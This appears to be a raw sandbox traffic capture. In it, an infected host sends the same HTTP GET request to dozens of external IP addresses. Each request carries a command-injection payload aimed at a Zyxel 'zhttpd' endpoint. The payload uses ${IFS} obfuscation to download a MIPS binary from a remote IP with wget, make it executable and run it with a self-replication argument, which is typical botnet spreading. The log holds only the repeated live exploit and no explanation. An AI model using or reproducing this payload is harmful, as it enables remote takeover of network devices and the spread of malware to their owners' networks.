                                                Jan 28, 2024 10:16:36.993463993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7507192.168.2.2350960196.98.190.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.993479013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7508192.168.2.2343744143.250.252.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.993490934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7509192.168.2.2349558153.205.178.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.993551970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7510192.168.2.2347058113.172.92.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.993576050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7511192.168.2.2357290100.209.108.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.993586063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7512192.168.2.2351626137.74.86.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.993607998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7513192.168.2.233820849.185.77.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.993633986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7514192.168.2.2333282171.142.178.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.993665934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7515192.168.2.233990867.20.218.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.993716002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7516192.168.2.23361504.170.174.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.993743896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7517192.168.2.2346382186.4.148.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.993747950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7518192.168.2.2343160209.199.234.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.993801117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7519192.168.2.235439617.250.236.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.993817091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7520192.168.2.2345186179.45.142.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.993822098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7521192.168.2.235492694.206.173.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.993870020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7522192.168.2.235723092.124.151.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.993875980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7523192.168.2.2350322211.235.135.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.993901968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7524192.168.2.2333486206.114.235.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.993947029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7525192.168.2.2340712193.112.27.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.993999958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7526192.168.2.234051634.211.53.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.994004011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7527192.168.2.235451618.37.47.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.994023085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7528192.168.2.2339386172.94.17.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.994040966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7529192.168.2.2339838134.116.198.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.994055986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7530192.168.2.2351136144.61.254.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.994102001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7531192.168.2.2345298151.230.74.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.994122982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7532192.168.2.2337622201.73.247.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.994144917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7533192.168.2.2350618141.70.71.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.994164944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7534192.168.2.2355774193.71.200.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.994188070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7535192.168.2.2359530171.34.153.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.994189024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7536192.168.2.234433658.12.216.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.994231939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7537192.168.2.2352348155.136.108.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.994288921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7538192.168.2.234083839.252.165.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.994297981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7539192.168.2.234886447.63.110.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.994318008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7540192.168.2.234791695.138.8.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.994343042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7541192.168.2.234656490.112.200.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.994390965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7542192.168.2.234309688.113.6.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.994414091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7543192.168.2.2349548208.11.173.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.994448900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7544192.168.2.2353908189.11.66.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.994467974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7545192.168.2.234276054.28.214.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.994496107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7546192.168.2.233601241.186.151.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.994522095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7547192.168.2.233755814.207.47.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.994556904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7548192.168.2.233483043.130.92.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.994587898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7549192.168.2.2334846222.136.86.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.994612932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7550192.168.2.23338745.43.234.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.994643927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7551192.168.2.2337142125.88.116.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.994674921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7552192.168.2.2358222169.103.10.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.994729996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7553192.168.2.2336334111.114.104.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.994729996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7554192.168.2.233658812.168.10.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.994766951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7555192.168.2.233318636.1.98.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.994801044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7556192.168.2.233492039.72.122.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.994823933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7557192.168.2.2350582222.253.222.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.994834900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7558192.168.2.234547071.233.246.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.994874001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7559192.168.2.235565885.56.210.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.997953892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7560192.168.2.235869832.143.165.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.997963905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7561192.168.2.2345690115.26.167.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.997987032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7562192.168.2.2334388191.110.175.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.998044968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7563192.168.2.234739465.148.125.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.998054028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7564192.168.2.2337936194.229.115.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.998079062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7565192.168.2.234283253.216.83.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.998119116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7566192.168.2.2333352221.96.121.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.998142958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7567192.168.2.2352924142.248.84.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.998171091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7568192.168.2.233524090.135.25.45443
                                                TimestampBytes transferredDirectionData
